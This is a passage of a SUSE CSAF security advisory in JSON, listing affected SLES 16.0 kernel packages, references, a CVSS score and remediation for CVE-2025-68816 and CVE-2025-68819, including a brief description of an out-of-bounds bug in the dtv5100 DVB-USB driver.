"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68816",
"url": "https://www.suse.com/security/cve/CVE-2025-68816"
},
{
"category": "external",
"summary": "SUSE Bug 1256674 for CVE-2025-68816",
"url": "https://bugzilla.suse.com/1256674"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68816"
},
{
"cve": "CVE-2025-68819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: dvb-usb: dtv5100: fix out-of-bounds in dtv5100_i2c_msg()\n\nrlen value is a user-controlled value, but dtv5100_i2c_msg() does not\ncheck the size of the rlen value. Therefore, if it is set to a value\nlarger than sizeof(st-\u003edata), an out-of-bounds vuln occurs for st-\u003edata.\n\nTherefore, we need to add proper range checking to prevent this vuln.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
